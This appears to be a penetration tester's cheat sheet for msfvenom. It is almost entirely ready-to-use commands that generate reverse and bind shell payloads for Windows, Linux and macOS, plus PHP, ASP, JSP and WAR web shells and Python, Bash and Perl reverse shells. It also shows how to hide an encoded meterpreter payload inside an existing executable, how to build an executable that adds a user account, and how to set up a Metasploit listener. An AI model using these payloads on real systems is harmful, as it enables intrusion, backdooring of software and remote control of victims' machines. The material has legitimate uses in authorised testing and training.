> For the complete documentation index, see [llms.txt](https://squid22.gitbook.io/notes/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://squid22.gitbook.io/notes/tools/msfvenon.md).

# msfvenon

```bash
# List of patloads, formats and platforms
msfvenon --list payloads
msfvenon --list formats
msfvenon --list platform

# Non-Staged
msfvenom -p windows/shell_reverse_tcp LHOST=196.168.0.101 LPORT=445 -f exe -o shell_reverse_tcp.exe

# Staged – Must use meterpreter – netcat won’t work
msfvenom -p windows/shell/reverse_tcp LHOST=196.168.0.101 LPORT=445 -f exe -o staged_reverse_tcp.exe

# Inject payload into a binary
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.101 LPORT=445 -f exe -e x86/shikata_ga_nai -i 9 -x "/somebinary.exe" -o bad_binary.exe  

# Generate non-staged ASP Shell
msfvenon -p windows/shell_reverse_tcp LHOST=10.11.0.47 LPORT=9098 -f asp -o shell.asp 
```

**A non-staged shell** is sent over in one block. You just send shell in one stage. This can be caught with metasploit multi-handler, but also with netcat.

**Staged shells** send them in turn. This can be useful for when you have very small buffer for your shellcode, so you need to divide up the payload. Meterpreter is a staged shell. First it sends some parts of it, and sets up the connection, and then it sends some more. This can be caught with metasploit multi-handler but not with netcat.

## Cheat Sheet

**List payloads**

```bash
msfvenom -l
```

## **Binaries Payloads**

**Linux Meterpreter Reverse Shell**

```bash
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f elf > shell.elf  
```

**Linux Bind Meterpreter Shell**

```bash
msfvenom -p linux/x86/meterpreter/bind_tcp RHOST=<Remote IP Address> LPORT=<Local Port> -f elf > bind.elf  
```

**Linux Bind Shell**

```bash
msfvenom -p generic/shell_bind_tcp RHOST=<Remote IP Address> LPORT=<Local Port> -f elf > term.elf  
```

**Windows Meterpreter Reverse TCP Shell**

```bash
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f exe > shell.exe  
```

**Windows Reverse TCP Shell**

```bash
msfvenom -p windows/shell/reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f exe > shell.exe  
```

**Windows Encoded Meterpreter Windows Reverse Shell**

```bash
msfvenom -p windows/meterpreter/reverse_tcp -e shikata_ga_nai -i 3 -f exe > encoded.exe  
```

**Mac Reverse Shell**

```bash
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f macho > shell.macho  
```

**Mac Bind Shell**

```bash
msfvenom -p osx/x86/shell_bind_tcp RHOST=<Remote IP Address> LPORT=<Local Port> -f macho > bind.macho  
```

## **Web Payloads**

**PHP Meterpreter Reverse TCP**

```bash
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f raw > shell.php
cat shell.php | pbcopy && echo ‘<?php ‘ | tr -d ‘\n’ > shell.php && pbpaste >> shell.php
```

**ASP Meterpreter Reverse TCP**

```bash
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f asp > shell.asp  
```

**JSP Java Meterpreter Reverse TCP**

```bash
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f raw > shell.jsp  
```

**WAR**

```bash
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f war > shell.war   
```

## **Scripting Payloads**

**Python Reverse Shell**

```bash
msfvenom -p cmd/unix/reverse_python LHOST=<Local IP Address> LPORT=<Local Port> -f raw > shell.py  
```

**Bash Unix Reverse Shell**

```bash
msfvenom -p cmd/unix/reverse_bash LHOST=<Local IP Address> LPORT=<Local Port> -f raw > shell.sh  
```

**Perl Unix Reverse shell**

```bash
msfvenom -p cmd/unix/reverse_perl LHOST=<Local IP Address> LPORT=<Local Port> -f raw > shell.pl  
```

## **Shellcode**

**Windows Meterpreter Reverse TCP Shellcode**

```bash
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f <language>  
```

**Linux Meterpreter Reverse TCP Shellcode**

```bash
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f <language>  
```

**Mac Reverse TCP Shellcode**

```bash
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f <language>   
```

**Create User**

```bash
msfvenom -p windows/adduser USER=hacker PASS=Hacker123$ -f exe > adduser.exe
```

**Metasploit Handler**

```bash
use exploit/multi/handler
set PAYLOAD <Payload name>
Set RHOST <Remote IP>
set LHOST <Local IP>
set LPORT <Local Port>
Run
```
